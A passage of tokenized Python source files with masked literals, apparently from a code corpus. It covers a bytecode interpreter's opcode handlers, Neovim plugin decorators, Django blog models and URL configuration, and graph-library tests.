<EOL> else : <EOL> self . pop ( ) <EOL> def byte_JUMP_IF_FALSE_OR_POP ( self , jump ) : <EOL> val = self . top ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> else : <EOL> self . pop ( ) <EOL> def byte_SETUP_LOOP ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_GET_ITER ( self ) : <EOL> self . push ( iter ( self . pop ( ) ) ) <EOL> def byte_FOR_ITER ( self , jump ) : <EOL> iterobj = self . top ( ) <EOL> try : <EOL> v = next ( iterobj ) <EOL> self . push ( v ) <EOL> except StopIteration : <EOL> self . pop ( ) <EOL> self . jump ( jump ) <EOL> def byte_BREAK_LOOP ( self ) : <EOL> return '<STR_LIT>' <EOL> def byte_CONTINUE_LOOP ( self , dest ) : <EOL> self . return_value = dest <EOL> return '<STR_LIT>' <EOL> def byte_SETUP_EXCEPT ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_SETUP_FINALLY ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_END_FINALLY ( self ) : <EOL> v = self . 
pop ( ) <EOL> if isinstance ( v , str ) : <EOL> why = v <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . return_value = self . pop ( ) <EOL> if why == '<STR_LIT>' : <EOL> block = self . pop_block ( ) <EOL> assert block . type == '<STR_LIT>' <EOL> self . unwind_block ( block ) <EOL> why = None <EOL> elif v is None : <EOL> why = None <EOL> elif issubclass ( v , BaseException ) : <EOL> exctype = v <EOL> val = self . pop ( ) <EOL> tb = self . pop ( ) <EOL> self . last_exception = ( exctype , val , tb ) <EOL> why = '<STR_LIT>' <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> return why <EOL> def byte_POP_BLOCK ( self ) : <EOL> self . pop_block ( ) <EOL> if PY2 : <EOL> def byte_RAISE_VARARGS ( self , argc ) : <EOL> exctype = val = tb = None <EOL> if argc == <NUM_LIT:0> : <EOL> exctype , val , tb = self . last_exception <EOL> elif argc == <NUM_LIT:1> : <EOL> exctype = self . pop ( ) <EOL> elif argc == <NUM_LIT:2> : <EOL> val = self . pop ( ) <EOL> exctype = self . pop ( ) <EOL> elif argc == <NUM_LIT:3> : <EOL> tb = self . pop ( ) <EOL> val = self . pop ( ) <EOL> exctype = self . pop ( ) <EOL> if isinstance ( exctype , BaseException ) : <EOL> val = exctype <EOL> exctype = type ( val ) <EOL> self . last_exception = ( exctype , val , tb ) <EOL> if tb : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif PY3 : <EOL> def byte_RAISE_VARARGS ( self , argc ) : <EOL> cause = exc = None <EOL> if argc == <NUM_LIT:2> : <EOL> cause = self . pop ( ) <EOL> exc = self . pop ( ) <EOL> elif argc == <NUM_LIT:1> : <EOL> exc = self . pop ( ) <EOL> return self . do_raise ( exc , cause ) <EOL> def do_raise ( self , exc , cause ) : <EOL> if exc is None : <EOL> exc_type , val , tb = self . 
last_exception <EOL> if exc_type is None : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif type ( exc ) == type : <EOL> exc_type = exc <EOL> val = exc ( ) <EOL> elif isinstance ( exc , BaseException ) : <EOL> exc_type = type ( exc ) <EOL> val = exc <EOL> else : <EOL> return '<STR_LIT>' <EOL> if cause : <EOL> if type ( cause ) == type : <EOL> cause = cause ( ) <EOL> elif not isinstance ( cause , BaseException ) : <EOL> return '<STR_LIT>' <EOL> val . __cause__ = cause <EOL> self . last_exception = exc_type , val , val . __traceback__ <EOL> return '<STR_LIT>' <EOL> def byte_POP_EXCEPT ( self ) : <EOL> block = self . pop_block ( ) <EOL> if block . type != '<STR_LIT>' : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . unwind_block ( block ) <EOL> def byte_SETUP_WITH ( self , dest ) : <EOL> ctxmgr = self . pop ( ) <EOL> self . push ( ctxmgr . __exit__ ) <EOL> ctxmgr_obj = ctxmgr . __enter__ ( ) <EOL> if PY2 : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> elif PY3 : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> self . push ( ctxmgr_obj ) <EOL> def byte_WITH_CLEANUP ( self ) : <EOL> v = w = None <EOL> u = self . top ( ) <EOL> if u is None : <EOL> exit_func = self . pop ( <NUM_LIT:1> ) <EOL> elif isinstance ( u , str ) : <EOL> if u in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> exit_func = self . pop ( <NUM_LIT:2> ) <EOL> else : <EOL> exit_func = self . pop ( <NUM_LIT:1> ) <EOL> u = None <EOL> elif issubclass ( u , BaseException ) : <EOL> if PY2 : <EOL> w , v , u = self . popn ( <NUM_LIT:3> ) <EOL> exit_func = self . pop ( ) <EOL> self . push ( w , v , u ) <EOL> elif PY3 : <EOL> w , v , u = self . popn ( <NUM_LIT:3> ) <EOL> tp , exc , tb = self . popn ( <NUM_LIT:3> ) <EOL> exit_func = self . pop ( ) <EOL> self . push ( tp , exc , tb ) <EOL> self . push ( None ) <EOL> self . push ( w , v , u ) <EOL> block = self . pop_block ( ) <EOL> assert block . type == '<STR_LIT>' <EOL> self . push_block ( block . type , block . handler , block . 
level - <NUM_LIT:1> ) <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> exit_ret = exit_func ( u , v , w ) <EOL> err = ( u is not None ) and bool ( exit_ret ) <EOL> if err : <EOL> if PY2 : <EOL> self . popn ( <NUM_LIT:3> ) <EOL> self . push ( None ) <EOL> elif PY3 : <EOL> self . push ( '<STR_LIT>' ) <EOL> def byte_MAKE_FUNCTION ( self , argc ) : <EOL> if PY3 : <EOL> name = self . pop ( ) <EOL> else : <EOL> name = None <EOL> code = self . pop ( ) <EOL> defaults = self . popn ( argc ) <EOL> globs = self . frame . f_globals <EOL> fn = Function ( name , code , globs , defaults , None , self ) <EOL> self . push ( fn ) <EOL> def byte_LOAD_CLOSURE ( self , name ) : <EOL> self . push ( self . frame . cells [ name ] ) <EOL> def byte_MAKE_CLOSURE ( self , argc ) : <EOL> if PY3 : <EOL> name = self . pop ( ) <EOL> else : <EOL> name = None <EOL> closure , code = self . popn ( <NUM_LIT:2> ) <EOL> defaults = self . popn ( argc ) <EOL> globs = self . frame . f_globals <EOL> fn = Function ( name , code , globs , defaults , closure , self ) <EOL> self . push ( fn ) <EOL> def byte_CALL_FUNCTION ( self , arg ) : <EOL> return self . call_function ( arg , [ ] , { } ) <EOL> def byte_CALL_FUNCTION_VAR ( self , arg ) : <EOL> args = self . pop ( ) <EOL> return self . call_function ( arg , args , { } ) <EOL> def byte_CALL_FUNCTION_KW ( self , arg ) : <EOL> kwargs = self . pop ( ) <EOL> return self . call_function ( arg , [ ] , kwargs ) <EOL> def byte_CALL_FUNCTION_VAR_KW ( self , arg ) : <EOL> args , kwargs = self . popn ( <NUM_LIT:2> ) <EOL> return self . call_function ( arg , args , kwargs ) <EOL> def call_function ( self , arg , args , kwargs ) : <EOL> lenKw , lenPos = divmod ( arg , <NUM_LIT> ) <EOL> namedargs = { } <EOL> for i in range ( lenKw ) : <EOL> key , val = self . popn ( <NUM_LIT:2> ) <EOL> namedargs [ key ] = val <EOL> namedargs . update ( kwargs ) <EOL> posargs = self . popn ( lenPos ) <EOL> posargs . extend ( args ) <EOL> func = self . 
pop ( ) <EOL> frame = self . frame <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> if func . im_self : <EOL> posargs . insert ( <NUM_LIT:0> , func . im_self ) <EOL> if not isinstance ( posargs [ <NUM_LIT:0> ] , func . im_class ) : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> func . im_func . func_name , <EOL> func . im_class . __name__ , <EOL> type ( posargs [ <NUM_LIT:0> ] ) . __name__ , <EOL> ) <EOL> ) <EOL> func = func . im_func <EOL> retval = func ( * posargs , ** namedargs ) <EOL> self . push ( retval ) <EOL> def byte_RETURN_VALUE ( self ) : <EOL> self . return_value = self . pop ( ) <EOL> if self . frame . generator : <EOL> self . frame . generator . finished = True <EOL> return "<STR_LIT>" <EOL> def byte_YIELD_VALUE ( self ) : <EOL> self . return_value = self . pop ( ) <EOL> return "<STR_LIT>" <EOL> def byte_YIELD_FROM ( self ) : <EOL> u = self . pop ( ) <EOL> x = self . top ( ) <EOL> try : <EOL> if not isinstance ( x , Generator ) or u is None : <EOL> retval = next ( x ) <EOL> else : <EOL> retval = x . send ( u ) <EOL> self . return_value = retval <EOL> except StopIteration as e : <EOL> self . pop ( ) <EOL> self . push ( e . value ) <EOL> else : <EOL> self . jump ( self . frame . f_lasti - <NUM_LIT:1> ) <EOL> return "<STR_LIT>" <EOL> def byte_IMPORT_NAME ( self , name ) : <EOL> level , fromlist = self . popn ( <NUM_LIT:2> ) <EOL> frame = self . frame <EOL> self . push ( <EOL> __import__ ( name , frame . f_globals , frame . f_locals , fromlist , level ) <EOL> ) <EOL> def byte_IMPORT_STAR ( self ) : <EOL> mod = self . pop ( ) <EOL> for attr in dir ( mod ) : <EOL> if attr [ <NUM_LIT:0> ] != '<STR_LIT:_>' : <EOL> self . frame . f_locals [ attr ] = getattr ( mod , attr ) <EOL> def byte_IMPORT_FROM ( self , name ) : <EOL> mod = self . top ( ) <EOL> self . push ( getattr ( mod , name ) ) <EOL> def byte_EXEC_STMT ( self ) : <EOL> stmt , globs , locs = self . popn ( <NUM_LIT:3> ) <EOL> six . 
exec_ ( stmt , globs , locs ) <EOL> if PY2 : <EOL> def byte_BUILD_CLASS ( self ) : <EOL> name , bases , methods = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( type ( name , bases , methods ) ) <EOL> elif PY3 : <EOL> def byte_LOAD_BUILD_CLASS ( self ) : <EOL> self . push ( __build_class__ ) <EOL> def byte_STORE_LOCALS ( self ) : <EOL> self . frame . f_locals = self . pop ( ) <EOL> if <NUM_LIT:0> : <EOL> def byte_SET_LINENO ( self , lineno ) : <EOL> self . frame . f_lineno = lineno </s>
<s> _admin_views_code = '''<STR_LIT>''' </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup , find_packages <EOL> import mana <EOL> version = <NUM_LIT> <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> packages = find_packages ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = entry_points , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import logging <EOL> from . . compat import IS_PYTHON3 <EOL> logger = logging . getLogger ( __name__ ) <EOL> debug , info , warn = ( logger . debug , logger . info , logger . warning , ) <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def plugin ( cls ) : <EOL> """<STR_LIT>""" <EOL> cls . _nvim_plugin = True <EOL> predicate = lambda fn : hasattr ( fn , '<STR_LIT>' ) <EOL> for _ , fn in inspect . getmembers ( cls , predicate ) : <EOL> if IS_PYTHON3 : <EOL> fn . _nvim_bind = False <EOL> else : <EOL> fn . im_func . _nvim_bind = False <EOL> return cls <EOL> def rpc_export ( rpc_method_name , sync = False ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = rpc_method_name <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = False <EOL> return f <EOL> return dec <EOL> def command ( name , nargs = <NUM_LIT:0> , complete = None , range = None , count = None , bang = False , <EOL> register = False , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name ) <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { } <EOL> if range is not None : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' if range is True else str ( range ) <EOL> elif count : <EOL> opts [ '<STR_LIT:count>' ] = count <EOL> if bang : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if register : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if nargs : <EOL> opts [ '<STR_LIT>' ] = nargs <EOL> if complete : <EOL> opts [ '<STR_LIT>' ] = complete <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . 
_nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def autocmd ( name , pattern = '<STR_LIT:*>' , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name , pattern ) <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { <EOL> '<STR_LIT>' : pattern <EOL> } <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . _nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def function ( name , range = False , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name ) <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { } <EOL> if range : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' if range is True else str ( range ) <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . _nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def shutdown_hook ( f ) : <EOL> """<STR_LIT>""" <EOL> f . _nvim_shutdown_hook = True <EOL> f . _nvim_bind = True <EOL> return f <EOL> def decode ( mode = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_decode = mode <EOL> return f <EOL> return dec <EOL> def encoding ( encoding = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( encoding , str ) : <EOL> encoding = True <EOL> def dec ( f ) : <EOL> f . _nvim_decode = encoding <EOL> return f <EOL> return dec </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . db import models <EOL> from django . db . models . signals import post_save <EOL> from django . utils import timezone <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from parler . models import TranslatedFields , TranslatableModel <EOL> from knocker . mixins import KnockerModel <EOL> from knocker . signals import notify_items <EOL> from meta . models import ModelMeta <EOL> class Post ( KnockerModel , ModelMeta , models . Model ) : <EOL> """<STR_LIT>""" <EOL> title = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:255> ) <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) ) <EOL> abstract = models . TextField ( _ ( '<STR_LIT>' ) ) <EOL> meta_description = models . TextField ( <EOL> verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> meta_keywords = models . TextField ( verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> author = models . ForeignKey ( User , verbose_name = _ ( '<STR_LIT>' ) , null = True , <EOL> blank = True ) <EOL> date_created = models . DateTimeField ( auto_now_add = True ) <EOL> date_modified = models . DateTimeField ( auto_now = True ) <EOL> date_published = models . DateTimeField ( _ ( '<STR_LIT>' ) , <EOL> default = timezone . now ) <EOL> date_published_end = models . DateTimeField ( _ ( '<STR_LIT>' ) , null = True , <EOL> blank = True ) <EOL> main_image = models . ImageField ( verbose_name = _ ( '<STR_LIT>' ) , blank = True , <EOL> upload_to = '<STR_LIT>' , null = True ) <EOL> text = models . TextField ( verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> image_url = models . 
CharField ( max_length = <NUM_LIT:200> , null = True , blank = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> get_latest_by = '<STR_LIT>' <EOL> def get_title ( self ) : <EOL> return self . title <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> def get_absolute_url ( self ) : <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . slug } ) <EOL> class MultiLanguagePost ( KnockerModel , ModelMeta , TranslatableModel ) : <EOL> """<STR_LIT>""" <EOL> translations = TranslatedFields ( <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:255> ) , <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) , blank = True , db_index = True ) , <EOL> ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def get_title ( self ) : <EOL> return self . title <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> def get_absolute_url ( self , language ) : <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . slug } ) <EOL> def should_knock ( self , created = False ) : <EOL> return self . get_current_language ( ) != '<STR_LIT>' <EOL> class NoKnockPost ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:255> ) <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) , blank = True , db_index = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> post_save . connect ( notify_items , sender = NoKnockPost ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from aldryn_apphooks_config . app_base import CMSConfigApp <EOL> from cms . apphook_pool import apphook_pool <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from djangocms_apphook_setup . base import AutoCMSAppMixin <EOL> from . cms_appconfig import BlogConfig <EOL> from . menu import BlogCategoryMenu <EOL> from . settings import get_setting <EOL> class BlogApp ( AutoCMSAppMixin , CMSConfigApp ) : <EOL> name = _ ( '<STR_LIT>' ) <EOL> urls = [ '<STR_LIT>' ] <EOL> app_name = '<STR_LIT>' <EOL> app_config = BlogConfig <EOL> menus = [ BlogCategoryMenu ] <EOL> auto_setup = { <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT:object_name>' : get_setting ( '<STR_LIT>' ) <EOL> } , <EOL> } <EOL> apphook_pool . register ( BlogApp ) <EOL> BlogApp . setup ( ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from cms . utils import get_language_list <EOL> from django . contrib . sitemaps import Sitemap <EOL> from parler . utils . context import smart_override <EOL> from . . models import Post <EOL> from . . settings import get_setting <EOL> class BlogSitemap ( Sitemap ) : <EOL> def priority ( self , obj ) : <EOL> if obj and obj . app_config : <EOL> return obj . app_config . sitemap_priority <EOL> return get_setting ( '<STR_LIT>' ) <EOL> def changefreq ( self , obj ) : <EOL> if obj and obj . app_config : <EOL> return obj . app_config . sitemap_changefreq <EOL> return get_setting ( '<STR_LIT>' ) <EOL> def location ( self , obj ) : <EOL> with smart_override ( obj . get_current_language ( ) ) : <EOL> return obj . get_absolute_url ( obj . get_current_language ( ) ) <EOL> def items ( self ) : <EOL> items = [ ] <EOL> for lang in get_language_list ( ) : <EOL> items . extend ( Post . objects . translated ( lang ) . language ( lang ) . published ( ) ) <EOL> return items <EOL> def lastmod ( self , obj ) : <EOL> return obj . date_modified </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> import sys <EOL> from cms . sitemaps import CMSSitemap <EOL> from cms . utils . conf import get_cms_setting <EOL> from django . conf import settings <EOL> from django . conf . urls import include , patterns , url <EOL> from django . conf . urls . i18n import i18n_patterns <EOL> from django . contrib import admin <EOL> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from djangocms_blog . sitemaps import BlogSitemap <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : settings . MEDIA_ROOT , '<STR_LIT>' : True } ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : get_cms_setting ( '<STR_LIT>' ) , '<STR_LIT>' : True } ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : CMSSitemap , '<STR_LIT>' : BlogSitemap , <EOL> } <EOL> } ) , <EOL> ) <EOL> urlpatterns += staticfiles_urlpatterns ( ) <EOL> if '<STR_LIT>' not in sys . argv : <EOL> urlpatterns += i18n_patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( <EOL> '<STR_LIT>' , namespace = '<STR_LIT>' , app_name = '<STR_LIT>' <EOL> ) ) , <EOL> ) <EOL> urlpatterns += i18n_patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> import collections <EOL> Error = collections . namedtuple ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) </s>
<s> from expects import * <EOL> from doublex_expects import have_been_called_with <EOL> from doublex import Spy <EOL> from spec . object_mother import * <EOL> from mamba import reporter <EOL> from mamba . example import PendingExample <EOL> with description ( PendingExample ) : <EOL> with before . each : <EOL> self . example = a_pending_example ( ) <EOL> self . reporter = Spy ( reporter . Reporter ) <EOL> with context ( '<STR_LIT>' ) : <EOL> with before . each : <EOL> self . example . run ( self . reporter ) <EOL> with it ( '<STR_LIT>' ) : <EOL> expect ( self . example . was_run ) . to ( be_false ) <EOL> with it ( '<STR_LIT>' ) : <EOL> expect ( self . reporter . example_pending ) . to ( have_been_called_with ( self . example ) ) </s>
<s> def type_check ( obj , target_type , exception_msg = None ) : <EOL> """<STR_LIT>""" <EOL> if type ( obj ) != target_type : <EOL> if exception_msg == None : <EOL> exception_msg = '<STR_LIT>' % ( str ( obj ) , str ( type ( obj ) ) , str ( target_type ) ) <EOL> raise TypeError , exception_msg <EOL> return <EOL> class ZenException ( Exception ) : <EOL> pass <EOL> class InvalidGraphTypeException ( ZenException ) : <EOL> pass <EOL> class GraphChangedException ( ZenException ) : <EOL> pass </s>
<s> import unittest <EOL> import zen <EOL> class FlowTestCase ( unittest . TestCase ) : <EOL> def test_min_cut ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT> , zen . 
min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( float ( '<STR_LIT>' ) , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> def test_min_cut_ ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge 